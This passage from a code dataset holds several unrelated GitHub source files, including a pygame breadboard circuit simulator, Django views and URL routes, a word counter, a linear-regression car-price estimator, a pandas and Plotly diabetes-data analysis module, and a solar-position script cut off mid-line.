self.texture.get_rect(), width=math.floor(2 / scale[0]))\n if pygame.mouse.get_pressed()[0] and rect_hovered is None and not incomplete_wire:\n self.env.selected = self\n if self.env.selected == self:\n pygame.draw.rect(surface, COL_SELECTED, self.texture.get_rect(), width=math.floor(4 / scale[0]))\n return surface, rect_hovered\n\n\nclass Breadboard(Part):\n \"\"\"A breadboard structure contains a large array of breadboard points that can be interfaced with to connect\n electronics together, and place wires onto for prototypical simulation\"\"\"\n\n def __init__(self, name, desc, texture, preview_texture, size, inch_tenth, radius, main, power_rail, env, plugins=None):\n super().__init__(name, desc, texture, preview_texture, env)\n self.size = size\n self.inch_tenth = inch_tenth\n self.radius = radius\n self.env = env\n self.main_board_config = main\n self.pr_config = power_rail\n self.plugins = {} if plugins is None else plugins\n self.main_board_rects, self.main_rails = self.create_rects(main, \"main\")\n self.pr_rects, self.pr_rails = self.create_rects(power_rail, \"power\")\n self.plain_surface = pygame.Surface(self.texture.get_size())\n self.drawing_surface = self.texture.copy()\n\n def __getstate__(self):\n \"\"\"Return state values to be pickled.\"\"\"\n return self.name, self.desc, self.texture_name, self.preview_texture_name, self.size, self.inch_tenth, \\\n self.radius, self.main_board_config, self.pr_config, self.plugins\n\n def __setstate__(self, state):\n \"\"\"Restore state from the unpickled state values.\"\"\"\n self.__init__(*state[:-1], pygame.env, plugins=state[-1])\n self.rejuvenate()\n\n # For every plugin in the breadboard, update the references such that when loaded from a save state,\n # the plugin correctly simulates a connection between regenerated breadboard points\n def rejuvenate(self):\n for plugin in self.plugins:\n plugin_obj = self.plugins[plugin]\n if isinstance(plugin_obj, IntegratedCircuit):\n new_reqs = self.ic_requirements(plugin.discriminator, plugin_obj.dip_count)\n plugin_obj.pins_to_nodes = new_reqs\n if isinstance(plugin_obj, LED):\n old_anode_group = plugin_obj.anode_point.discriminator.name\n group_1 = None\n if old_anode_group == \"main\":\n group_1 = self.main_board_rects\n elif old_anode_group == \"power\":\n group_1 = self.pr_rects\n old_cathode_group = plugin_obj.cathode_point.discriminator.name\n group_2 = None\n if old_cathode_group == \"main\":\n group_2 = self.main_board_rects\n elif old_cathode_group == \"power\":\n group_2 = self.pr_rects\n plugin_obj.anode_point = group_1[plugin_obj.anode_point.discriminator][2]\n plugin_obj.cathode_point = group_2[plugin_obj.cathode_point.discriminator][2]\n\n # Given a config, generate the correct number of breadboard points which the breadboard should contain\n def create_rects(self, board_config, name):\n if board_config is None:\n return {}, \"\"\n rects = {}\n rails = []\n\n # Two segments of a breadboard, separated by DIP support\n for segment in range(2):\n\n segment_y = board_config.start_coord[1] + (segment * board_config.segment_gap)\n\n # Inline repetitions of a segment\n for rep in range(board_config.per_segment_rep_count):\n\n rep_x = board_config.start_coord[0] + (rep * board_config.per_segment_rep_gap)\n\n # Vertical columns of breadboard points\n for column in range(board_config.per_segment_columns):\n\n column_x = rep_x + (self.inch_tenth * column)\n\n # Horizontal rows of breadboard points\n for row in range(board_config.per_column_rows):\n\n # Calculate the relation rule of the breadboard rail (how are they connected)\n rail_discrim = (segment if board_config.rule.segment else None,\n rep if board_config.rule.repetition else None,\n column if board_config.rule.column else None,\n row if board_config.rule.row else None)\n\n # Check if the rail already exists\n found = None\n for rail in rails:\n if rail.rail_discriminator == rail_discrim:\n found = rail\n if found is None:\n found = BreadboardRail(rail_discrim)\n rails.append(found)\n\n # Create a rect and a breadboard point\n row_y = segment_y + (self.inch_tenth * row)\n rect_tl = (column_x - (self.inch_tenth / 2), row_y - (self.inch_tenth / 2))\n rect_wh = (self.inch_tenth, self.inch_tenth)\n rect = pygame.Rect(rect_tl, rect_wh)\n discriminator = Discriminator(segment, rep, column, row, name)\n point = BreadboardPoint(self, discriminator, found, rect)\n\n # Store\n rects[discriminator] = rect, found, point\n\n return rects, rails\n\n # Calculate the amount of points required by an IC to fit on the breadboard\n def ic_requirements(self, ic_discrim, ic_dips):\n pins_to_nodes = {}\n for i in range(ic_dips):\n if i < ic_dips/2:\n discriminator = (ic_discrim.segment + 1, ic_discrim.rep, ic_discrim.column + i, ic_discrim.row, ic_discrim.name)\n else:\n f_x = i + (ic_dips - 1) - (2 * i)\n discriminator = (ic_discrim.segment, ic_discrim.rep, ic_discrim.column + f_x, ic_discrim.row, ic_discrim.name)\n pins_to_nodes[i] = self.main_board_rects[discriminator][1]\n return pins_to_nodes\n\n # Check if an IC will collide with other elements on a breadboard given the coordinate\n def ic_collision(self, ic_discrim, ic_dips):\n requirements = [i.uuid for i in self.ic_requirements(ic_discrim, ic_dips).values()]\n for plugin in self.plugins.values():\n if isinstance(plugin, IntegratedCircuit):\n for node in plugin.pins_to_nodes.values():\n if node.uuid in requirements:\n return True\n return False\n\n # Check if an IC is allowed to sit on a row of breadboard points given the coordinate\n def ic_allowed(self, ic, point_hovered):\n discriminator = point_hovered.discriminator\n if discriminator.segment == 0:\n rows = self.main_board_config.per_column_rows\n if discriminator.row == (rows - 1):\n columns = self.main_board_config.per_segment_columns\n if discriminator.column + (ic.dip_count / 2) <= columns:\n col = self.ic_collision(discriminator, ic.dip_count)\n return not col\n return False\n\n # Convert from a position to a coordinate and scale\n def point_to_coord(self, real_pos, point, scale):\n for rect_group in [self.main_board_rects, self.pr_rects]:\n for coord in rect_group:\n p = rect_group[coord][2]\n if p == point:\n r = rect_group[coord][0].copy()\n real_r_pos = tuple(map(sum, zip(real_pos, (r.centerx * scale[0], r.centery * scale[1]))))\n return real_r_pos\n return 0, 0\n\n # Return a surface that only contains the LED bulb heads\n def surface_led(self):\n surface = self.plain_surface.copy()\n surface.set_colorkey((0, 0, 0))\n for plugin in self.plugins:\n plugin_obj = self.plugins[plugin]\n if isinstance(plugin_obj, LED):\n plugin_rect = plugin.rect\n plugin_surf = plugin_obj.surface(self)[0]\n plugin_size = plugin_surf.get_width(), plugin_surf.get_height()\n plugin_pos = (plugin_rect.centerx - plugin_size[0] / 2, plugin_rect.centery - plugin_size[1] / 2)\n surface.blit(plugin_surf, plugin_pos)\n return surface\n\n # Return a surface that contains all plugin parts on the part texture\n def surface(self, real_pos, scale):\n\n rect_hovered = None\n\n # Prepare the surface\n self.texture.blit(self.drawing_surface, (0, 0))\n surface = self.texture\n\n # Draw plugins\n incomplete_wire = any(isinstance(x, BreadboardPoint) or isinstance(x, PluginPart) for x in self.env.query_disable)\n for plugin in self.plugins:\n\n # Prepare plugin surface\n plugin_obj = self.plugins[plugin]\n plugin_rect = plugin.rect\n plugin_surf = plugin_obj.surface(self)[0]\n plugin_size = plugin_surf.get_width(), plugin_surf.get_height()\n\n # Snap plugin to center if it is an Integrated Circuit\n if isinstance(plugin_obj, IntegratedCircuit):\n plugin_pos = (plugin_rect.left, plugin_rect.centery)\n else:\n plugin_pos = (plugin_rect.centerx - plugin_size[0]/2, plugin_rect.centery - plugin_size[1]/2)\n\n # Draw plugin\n surface.blit(plugin_surf, plugin_pos)\n\n # Check if the plugin is hovered with the mouse\n if not len(self.env.query_disable) or self.env.query_disable == [plugin_rect]:\n scaled_topleft = tuple(map(lambda i, j, k: (i*j)+k, plugin_pos, scale, real_pos))\n plugin_surf_rect = plugin_surf.get_rect(topleft=scaled_topleft)\n plugin_surf_rect.w *= scale[0]\n plugin_surf_rect.h *= scale[1]\n if plugin_surf_rect.collidepoint(pygame.mouse.get_pos()):\n if plugin_rect not in self.env.query_disable:\n self.env.query_disable.append(plugin_rect)\n pygame.draw.rect(surface, COL_SELECTED, plugin_surf.get_rect(topleft=plugin_pos), width=math.floor(2 / scale[0]))\n if pygame.mouse.get_pressed()[0]:\n if incomplete_wire is False:\n plugin_obj.deletion_key = self, plugin\n self.env.selected = plugin_obj\n else:\n if plugin_rect in self.env.query_disable:\n self.env.query_disable.remove(plugin_rect)\n\n # If there is a volatile switch that is not pressed, make sure it is off\n if not pygame.mouse.get_pressed()[0]:\n if isinstance(plugin_obj, Switch):\n if not plugin_obj.latch:\n plugin_obj.state = 0\n\n # Draw an outline if the plugin is selected\n if self.env.selected == plugin_obj:\n pygame.draw.rect(surface, COL_SELECTED, plugin_surf.get_rect(topleft=plugin_pos), width=math.floor(4 / scale[0]))\n\n # Check if the breadboard is hovered\n if not len(self.env.query_disable) or incomplete_wire:\n\n surface_rect = self.texture.get_rect().copy()\n surface_rect.w *= scale[0]\n surface_rect.h *= scale[1]\n surface_rect.topleft = real_pos\n\n # Find a hovered point\n for rect_group in [self.main_board_rects, self.pr_rects]:\n for coord in rect_group:\n pygame.draw.circle(surface, COL_BREADBOARD_HOLE, rect_group[coord][0].center, self.radius)\n if surface_rect.collidepoint(pygame.mouse.get_pos()):\n r = rect_group[coord][0].copy()\n real_r_pos = tuple(map(sum, zip(real_pos, (r.x * scale[0], r.y * scale[1]))))\n r.w *= scale[0]\n r.h *= scale[1]\n r.topleft = real_r_pos\n if r.collidepoint(pygame.mouse.get_pos()):\n rect_hovered = rect_group[coord][2]\n pygame.draw.rect(surface, COL_BLACK, rect_group[coord][0])\n\n # Draw an outline around breadboard if hovered\n if surface_rect.collidepoint(pygame.mouse.get_pos()):\n pygame.draw.rect(surface, COL_SELECTED, self.texture.get_rect(), width=2)\n if pygame.mouse.get_pressed()[0] and rect_hovered is None and not incomplete_wire:\n self.env.selected = self\n\n # Draw an outline around breadboard if selected\n if self.env.selected == self:\n pygame.draw.rect(surface, COL_SELECTED, self.texture.get_rect(), width=4)\n\n return surface, rect_hovered\n\n\nclass BreadboardPoint:\n \"\"\"A structure denoting an individual point on a breadboard, which may be common to a rail\"\"\"\n\n def __init__(self, parent, discriminator, common, rect):\n self.parent = parent\n self.discriminator = discriminator\n self.common = common\n self.rect = rect\n\n\nclass BreadboardRail(Node):\n \"\"\"A structure denoting a set of points on a breadboard that are electrically connected\"\"\"\n\n def __init__(self, rail_discriminator):\n super().__init__()\n self.rail_discriminator = rail_discriminator\n\n\nclass PluginPart(Part):\n \"\"\"A type of part which must be plugged into a breadboard\"\"\"\n\n def __init__(self, name, desc, texture, preview_texture, env):\n super().__init__(name, desc, texture, preview_texture, env)\n self.deletion_key = None\n\n def surface(self, hovered_board):\n pass\n\n\nclass LED(PluginPart):\n \"\"\"The LED is a structure containing details about where the positive and negative terminals are connected, the\n colour of the light, if the light is functioning and its state\"\"\"\n\n def __init__(self, name, desc, texture, preview_texture, on_colour, off_colour, env, anode_point=None, cathode_point=None):\n super().__init__(name, desc, texture, preview_texture, env)\n self.state = 0\n self.on_colour = on_colour\n self.off_colour = off_colour\n self.cathode_connecting = False\n self.anode_point = anode_point\n self.cathode_point = cathode_point\n self.alive = True\n\n def __getstate__(self):\n \"\"\"Return state values to be pickled.\"\"\"\n return self.name, self.desc, self.texture_name, self.preview_texture_name, self.on_colour, self.off_colour, self.anode_point, self.cathode_point\n\n def __setstate__(self, state):\n \"\"\"Restore state from the unpickled state values.\"\"\"\n self.__init__(*state[:-2], pygame.env, anode_point=state[-2], cathode_point=state[-1])\n\n # Draw the LED\n def surface(self, hovered_board):\n\n inch_tenth = hovered_board.inch_tenth\n\n # Prepare the surface\n surface = pygame.Surface((inch_tenth*2, inch_tenth*2))\n surface.set_colorkey((0, 0, 0))\n\n # Draw the bulb\n pygame.draw.circle(surface, self.off_colour, surface.get_rect().center, inch_tenth)\n\n # If it is dead, draw an X on it\n if not self.alive:\n pygame.draw.line(surface, COL_FAKE_BLACK, (0, 0), (inch_tenth*2, inch_tenth*2), width=10)\n pygame.draw.line(surface, COL_FAKE_BLACK, (inch_tenth*2, 0), (0, inch_tenth*2), width=10)\n\n # Otherwise if it is on, draw the light\n elif self.state:\n pygame.draw.circle(surface, self.on_colour, surface.get_rect().center, math.floor(3*(inch_tenth/4)))\n\n return surface, None\n\n\nclass IntegratedCircuit(PluginPart):\n \"\"\"The integrated circuit is a structure containing the number of points it occupies, the related subcircuit\n raw SPICE data and any relevant documentation.\"\"\"\n\n def __init__(self, name, desc, texture, preview_texture, dip_count, raw_spice, spice_nodes, datasheet_img, env, pin_map=None):\n super().__init__(name, desc, texture, preview_texture, env)\n path = env.get_main_path()\n self.dip_count = dip_count\n self.raw_spice = raw_spice\n self.spice_nodes = spice_nodes\n self.datasheet_file = datasheet_img\n self.datasheet_image = pygame.image.load(os.path.join(path, 'assets', 'textures', 'datasheets', datasheet_img))\n self.pins_to_nodes = {} if pin_map is None else pin_map\n\n def __getstate__(self):\n \"\"\"Return state values to be pickled.\"\"\"\n return self.name, self.desc, self.texture_name, self.preview_texture_name, self.dip_count, self.raw_spice, self.spice_nodes, self.datasheet_file, self.pins_to_nodes\n\n def __setstate__(self, state):\n \"\"\"Restore state from the unpickled state values.\"\"\"\n self.__init__(*state[:-1], pygame.env, pin_map=state[-1])\n\n # Return a surface containing the integrated circuit and its labels\n def draw(self, inch_tenth, radius, gap):\n\n # Prepare the surface and text handlers\n win = pygame.Surface(((self.dip_count/2)*inch_tenth, gap+inch_tenth))\n handler = TextHandler(self.env, 'Play-Regular.ttf', radius*4)\n pin_handler = TextHandler(self.env, 'Play-Regular.ttf', math.floor(radius*1.5))\n\n # Render the label\n label = handler.render(self.name)\n win.set_colorkey((0, 0, 0))\n\n # Draw the DIP chassis\n rect = pygame.Rect(0, radius, win.get_width(), win.get_height()-(2*radius))\n pygame.draw.rect(win, COL_IC_LID, rect)\n\n # For each pin, draw a smaller rectangle corresponding to the breadboard point\n # Also draw a label showing the purpose of the pin\n for i in range(self.dip_count):\n if i < self.dip_count/2:\n r = pygame.Rect((inch_tenth/2) - (radius/2) + (inch_tenth*i), win.get_height()-radius, radius, radius)\n pygame.draw.rect(win, COL_IC_PIN, r)\n r_label = pin_handler.render(self.spice_nodes[i])\n win.blit(r_label, (r.centerx - (r_label.get_width()/2), r.y - r_label.get_height()))\n else:\n r = pygame.Rect((win.get_width() - (inch_tenth / 2)) - (radius/2) - (inch_tenth * (i-(self.dip_count/2))), 0, radius, radius)\n pygame.draw.rect(win, COL_IC_PIN, r)\n r_label = pin_handler.render(self.spice_nodes[i])\n win.blit(r_label, (r.centerx - (r_label.get_width()/2), r.bottom))\n\n # Draw the label\n win.blit(label, (win.get_width()/2 - label.get_width()/2, win.get_height()/2 - label.get_height()/2))\n\n return win\n\n # Return a surface containing the integrated circuit and its labels\n def surface(self, hovered_board):\n main_board_config = hovered_board.main_board_config\n inch_tenth, radius = hovered_board.inch_tenth, hovered_board.radius\n gap = main_board_config.segment_gap - (main_board_config.per_column_rows*inch_tenth)\n surface = self.draw(inch_tenth, radius, gap)\n return surface, None\n\n\nclass Switch(IntegratedCircuit):\n \"\"\"The switch structure contains the type of switch and acts as an integrated circuit so that it uses the\n same rules when connecting to a breadboard\"\"\"\n\n def __init__(self, name, desc, texture, preview_texture, dip_count, raw_spice, spice_nodes, latch, datasheet_img, env, pin_map=None):\n super().__init__(name, desc, texture, preview_texture, dip_count, raw_spice, spice_nodes, datasheet_img, env, pin_map=pin_map)\n self.state = 0\n self.latch = latch\n self.raw_spice = \"\"\n\n def __getstate__(self):\n \"\"\"Return state values to be pickled.\"\"\"\n return self.name, self.desc, self.texture_name, self.preview_texture_name, self.dip_count, self.raw_spice, \\\n self.spice_nodes, self.latch, self.datasheet_file, self.pins_to_nodes\n\n def __setstate__(self, state):\n \"\"\"Restore state from the unpickled state values.\"\"\"\n self.__init__(*state[:-1], pygame.env, pin_map=state[-1])\n\n # Return a surface containing the switch\n def draw(self, inch_tenth, radius, gap):\n\n # Prepare the surface\n win = pygame.Surface(((self.dip_count/2)*inch_tenth, gap+inch_tenth))\n win.set_colorkey((0, 0, 0))\n\n # Draw the switch body\n rect = pygame.Rect(0, radius, win.get_width(), win.get_height()-(2*radius))\n pygame.draw.rect(win, COL_SWITCH, rect)\n\n # Draw the switch shaft\n switch_shaft = pygame.Rect(rect.centerx - rect.w*3/8, rect.centery - rect.h*1/5, rect.w*3/4, rect.h*2/5)\n pygame.draw.rect(win, COL_SWITCH_SHAFT, switch_shaft)\n\n # Draw the switch\n switch = pygame.Rect((rect.centerx - rect.w*3/8) + (self.state*rect.w*3/8), rect.centery - rect.h*1/5, rect.w*3/8, rect.h*2/5)\n pygame.draw.rect(win, (1, 1, 1), switch)\n\n # Draw the switch indicator\n pygame.draw.circle(win, COL_WHITE, switch.center, switch.w/4)\n\n # Draw the pins without labels\n for i in range(self.dip_count):\n if i < self.dip_count/2:\n r = pygame.Rect((inch_tenth/2) - (radius/2) + (inch_tenth*i), win.get_height()-radius, radius, radius)\n pygame.draw.rect(win, COL_IC_PIN, r)\n else:\n r = pygame.Rect((win.get_width() - (inch_tenth / 2)) - (radius/2) - (inch_tenth * (i-(self.dip_count/2))), 0, radius, radius)\n pygame.draw.rect(win, COL_IC_PIN, r)\n\n return win\n","repo_name":"devkapa/devolt","sub_path":"logic/parts.py","file_name":"parts.py","file_ext":"py","file_size_in_byte":33718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"15772842342","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import OverFunds, TransType, Trans, SourceMoney, Users\nfrom django.db.models import F, Sum\n\n\ndef HomePageView(request):\n sources = SourceMoney.objects.all()\n total = SourceMoney.objects.aggregate(Sum('sum'))\n\n return render(request, 'buh/index.html', {\n 'sources': sources,\n 'total': total.get('sum__sum')\n })\n\ndef AddTransaction(request):\n sources = Trans.objects.all()\n\n return render(request, 'buh/add_trans.html', {\n 'sources': sources\n\n })\n\n\n\n","repo_name":"bolt41/gitBolt","sub_path":"FamilyMoney/buh/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72803725159","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 23 00:00:16 2018\n\n@author: laureano\n\"\"\"\n\ndef wc(filename):\n with open(filename, 'r') as f:\n lines = f.readlines()\n words =''\n for w in lines:\n if w == ' ' or w =='':\n continue\n else:\n words += w\n\n return (len(lines),len(words.split()),len(words))\n \n#print(wc('shakespeare.txt'))\n \n \n ","repo_name":"laureansvictor/FPRO","sub_path":"re12/wc.py","file_name":"wc.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36727113648","text":"\"\"\"\nURL configuration for seminar project.\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom .views import index, head_tails, cubes, hundred, about, headtails_values, rolls, game_roll\n\n\nurlpatterns = [\n path('', index, name='index'),\n path('headtails', head_tails, name='head_tails'),\n path('headtails_values', headtails_values, name='headtails_values'),\n path('cubes', cubes, name='cubes'),\n path('hundred/', hundred, name='hundred'),\n path('about/', about, name='about'),\n path('rolls/', rolls, name='rolls'),\n path('/', game_roll, name='game_roll'),\n]","repo_name":"olgabikbulatova/flaskhw2","sub_path":"Django/seminar/gameapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70192297962","text":"from train import read_file\n\n\ndef predict(th0, th1, x):\n return th0 + (x * th1)\n\n\ndef validate_estimator(content):\n for line in content:\n if line.startswith(\"#\") or line == '\\n':\n continue\n try:\n th0 = float(line.split(',')[0])\n th1 = float(line.split(',')[1])\n except Exception:\n print('Wrong format of \\'train_result.csv\\'')\n exit()\n return th0, th1\n\n\ndef main():\n content = read_file(\"train_result.csv\")\n th0, th1 = validate_estimator(content)\n mileage = float(input(\"\\nPlease enter mileage: \"))\n try:\n price = predict(th0, th1, mileage)\n except OverflowError:\n print('The number is too big')\n exit()\n print('Estimated price: {0}'.format(price))\n \n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"etuffleb/linear_regression","sub_path":"estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"70725577959","text":"# math_utils.py\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport io\nimport base64\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objs as go\n\n# Placeholder for the trained model\ntrained_model = None\n\ndef df():\n excel = pd.ExcelFile(\"cdc.xlsx\")\n\n sheet_names = excel.sheet_names\n dataframes = []\n\n for sheet_name in sheet_names:\n df = excel.parse(sheet_name)\n dataframes.append(df)\n\n df_d, df_o, df_i = dataframes[0], dataframes[1], dataframes[2]\n\n df_d.drop(columns=[\"YEAR\", \"COUNTY\", \"STATEW\"], inplace=True)\n merge_df_do = pd.merge(df_d, df_o, on='FIPS', how='inner')\n merge_df_do.drop(columns=[\"YEAR\", \"COUNTY\", \"STATE\"], inplace=True)\n\n de_new_f = df_i.rename(columns={'FIPDS': 'FIPS'})\n\n merge_df_all = pd.merge(merge_df_do, de_new_f, on='FIPS', how='inner')\n merge_df_all.drop(columns=[\"YEAR\", \"COUNTY\", \"STATE\"], inplace=True)\n return merge_df_all, merge_df_all.columns.tolist()\n\ndef getinfo(merge_df_all):\n columns = merge_df_all.columns.tolist()\n matplotlib.use('agg')\n plt.ioff()\n\n # Pair plot\n pairplot_img = io.BytesIO()\n sns.pairplot(merge_df_all.iloc[:, -3:])\n plt.savefig(pairplot_img, format='png')\n plt.close()\n pairplot_img_base64 = base64.b64encode(pairplot_img.getvalue()).decode('utf-8')\n matplotlib.use(matplotlib.get_backend())\n\n # Histograms\n hist_plots_img = io.BytesIO()\n fig, ax = plt.subplots(1, len(columns), figsize=(15, 5))\n\n for i in range(len(columns)):\n sns.histplot(merge_df_all[columns[i]], ax=ax[i], kde=True)\n\n plt.tight_layout()\n plt.savefig(hist_plots_img, format='png')\n plt.close()\n\n hist_plots_img_base64 = base64.b64encode(hist_plots_img.getvalue()).decode('utf-8')\n\n # Skewness\n skewness_table_img = io.BytesIO()\n skewness = merge_df_all.iloc[:, -3:].skew()\n skewness_df = skewness.to_frame().reset_index() \n\n # Convert skewness table to HTML and write to BytesIO\n skewness_table_img.write(skewness_df.to_html(index=False, justify='center', classes='table table-bordered table-condensed table-striped').encode('utf-8'))\n skewness_table_img.seek(0)\n skewness_table_html = skewness_table_img.read().decode('utf-8') # Convert BytesIO to string\n\n # Correlation Matrix\n correlation_matrix_table_img = io.BytesIO()\n correlation_matrix = merge_df_all.iloc[:, -3:].corr()\n\n # Convert correlation matrix table to HTML and write to BytesIO\n correlation_matrix_table_img.write(correlation_matrix.to_html(index=True, justify='center', classes='table table-bordered table-condensed table-striped').encode('utf-8'))\n correlation_matrix_table_img.seek(0)\n correlation_matrix_table_img_base64 = base64.b64encode(correlation_matrix_table_img.read()).decode('utf-8')\n\n # Heat map\n corr_matrix_heatmap_img = io.BytesIO()\n axis_corr = sns.heatmap(correlation_matrix, vmin=-1, vmax=1, center=0, annot=True, annot_kws={'size': 12})\n cbar = axis_corr.collections[0].colorbar\n cbar.ax.tick_params(labelsize=12)\n plt.savefig(corr_matrix_heatmap_img, format='png')\n plt.close()\n corr_matrix_heatmap_img_base64 = base64.b64encode(corr_matrix_heatmap_img.getvalue()).decode('utf-8')\n\n return {\n 'pairplot_img_base64': pairplot_img_base64,\n 'hist_plots_img_base64': hist_plots_img_base64,\n 'skewness_table_html': skewness_table_html,\n 'corr_matrix_heatmap_img_base64': corr_matrix_heatmap_img_base64,\n 'data_table': skewness_df.to_html(index=False, justify='center', classes='table table-bordered table-condensed table-striped'),\n 'correlation_matrix_table': correlation_matrix.to_html(index=True, justify='center', classes='table table-bordered table-condensed table-striped'),\n 'summary_stats': merge_df_all.describe().to_html(classes='table table-bordered table-condensed table-striped')\n }\n\n\ndef model():\n merge_df_all, columns = df()\n\n X = merge_df_all[['% OBESE', '% INACTIVE']]\n y = merge_df_all[['% DIABETIC']] \n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42) \n\n model = LinearRegression()\n model.fit(X_train, y_train) \n\n y_predict = model.predict(X_test) \n\n scatter_plot_data = {\n 'x': X_test['% OBESE'].tolist(),\n 'y': X_test['% INACTIVE'].tolist(),\n 'z': y_test['% DIABETIC'].tolist(),\n }\n\n return {\n 'model': model,\n 'scatter_plot_data': scatter_plot_data,\n }\n\n\ndef plot_scatter_3d(model, merge_df_all, z_data):\n X_test = merge_df_all[['% OBESE', '% INACTIVE']]\n \n # Predict the values using the trained model\n y_predict = model.predict(X_test)\n\n # Create 3D scatter plot\n trace_actual = go.Scatter3d(\n x=X_test['% OBESE'],\n y=X_test['% INACTIVE'],\n z=z_data,\n mode='markers',\n marker=dict(size=5, color='blue'),\n name='Actual Data'\n )\n\n trace_predict = go.Scatter3d(\n x=X_test['% OBESE'],\n y=X_test['% INACTIVE'],\n z=y_predict,\n mode='markers',\n marker=dict(size=5, color='red'),\n name='Predicted Values'\n )\n\n fig = make_subplots(rows=1, cols=1, specs=[[{'type': 'scatter3d'}]])\n fig.add_trace(trace_actual)\n fig.add_trace(trace_predict)\n\n fig.update_layout(\n scene=dict(\n xaxis=dict(title='% OBESE'),\n yaxis=dict(title='% INACTIVE'),\n zaxis=dict(title='% DIABETIC'),\n ),\n title='Scatter Plot with Multilinear Regression',\n showlegend=True,\n )\n\n # Convert the plot to base64 string\n model_plot_img_base64 = fig.to_image(format='png')\n model_plot_img_base64 = base64.b64encode(model_plot_img_base64).decode('utf-8')\n\n return model_plot_img_base64\n\ndef predict(model, obese, inactive):\n # Placeholder for prediction logic\n # You should use the provided model to make predictions based on the input features\n # Replace the following line with the actual prediction code\n predicted_diabetic = model.predict([[obese, inactive]])[0]\n print(predicted_diabetic)\n return predicted_diabetic\n\n\n# # Load the model during the startup\n# trained_model_results = model()\n# trained_model = trained_model_results['model']\n\n# # Print the predicted value for the initial values (12, 34)\n# initial_obese = 12\n# initial_inactive = 34\n# predicted_diabetic_initial = predict_diabetic(trained_model, initial_obese, initial_inactive)\n# print(f\"Predicted diabetic value for (12, 34): {predicted_diabetic_initial}\")\n\n\n# Uncomment the following lines to test the functions\n# df()\n# getinfo()\n# model()\n# predict()\n\ntrained_model_results = model()\ntrained_model = trained_model_results['model']\npredicted_diabetic = predict(trained_model, 12, 34)","repo_name":"nikhil9066/flaskwork","sub_path":"math_utils.py","file_name":"math_utils.py","file_ext":"py","file_size_in_byte":7007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11693936165","text":"############################################################################\n# Project: Forest Dynamics at the 'Woods of the World'\n# Title: Calculation of the fractional light recieved by each stand\n# Author: James Gilmore\n# Email: james.gilmore@pgr.reading.ac.uk.\n# Version: 1.0.0\n# Date: 22/12/15\n# Status: Alpha\n############################################################################\n\n#Initialising the python script\nfrom __future__ import absolute_import, division, print_function\nfrom scipy.integrate import quad, dblquad\nfrom array import array\nimport numpy as np\nimport warnings\n\n#Define the equitorial coordinate system\nzenith = lambda H, dec, lat: np.arcsin(np.sin(lat)*np.sin(dec)+np.cos(lat)*np.cos(dec)*np.cos(H))\nazimuth = lambda lat, dec, zenith: np.arccos((np.sin(dec)-np.sin(zenith)*np.sin(lat))/(np.cos(zenith)*np.cos(lat)))\ndec = lambda Jday: np.arcsin(np.sin(np.radians(-23.44))*np.cos((np.radians(360)/365.24)*(Jday+10)+(np.radians(360)/np.pi)*0.0167*np.sin((np.radians(360)/365.24)*(Jday-2))))\nhe = lambda Jday: 0.17*np.sin((4*np.pi*(Jday-80))/373)-0.129*np.sin((2*np.pi*(Jday-8))/355)\ngam = lambda h: -15*np.floor(h)\nH = lambda hl, gaml, gam, he: (np.pi/12)*(hl-(24*(gaml-gam)/360)+he-12)\ntd = lambda Jday: (2*np.pi*(np.floor(Jday)-1))/365\n\n#Define the equations specific to the NBGW\nSolElvNBGW = lambda h, day: zenith(H(h, np.radians(-4.15176), gam(0), he(day)), np.radians(dec(day)), np.radians(51.83756))*57.2957795\n\n#### Be careful: Put hours in double format (i.e. 3am is 3.0 NOT 3)\nSolAziNBGW = lambda h, day: np.piecewise(h, [h < 12.01854275271367, h >= 12.01854275271366], [lambda h: azimuth(np.radians(51.83756), np.radians(dec(day)), np.radians(SolElvNBGW(h,day)))*57.2957795, lambda h: 360-azimuth(np.radians(51.83756), np.radians(dec(day)), np.radians(SolElvNBGW(h,day)))*57.2957795])\n\n#Dawn and Dusk\nDawn = lambda day: 11.9952 - 3.81972*np.arccos(1.27249*np.tan(0.0174533*np.arcsin(0.397789*np.cos(0.172029 + 0.0172029*day + 0.0334*np.sin(0.0172029*(-2. + day)))))) - 0.17*np.sin(0.03369*(-80. + day)) + 0.129*np.sin(0.0176991*(-8. + day))\nDusk = lambda day: 11.9952 + 3.81972*np.arccos(1.27249*np.tan(0.0174533*np.arcsin(0.397789*np.cos(0.172029 + 0.0172029*day + 0.0334*np.sin(0.0172029*(-2. + day)))))) - 0.17*np.sin(0.03369*(-80. + day)) + 0.129*np.sin(0.0176991*(-8. + day))\n\n#Import the data of the tree set in the correct columnar form:\nX, Y, HE, CH, CW = 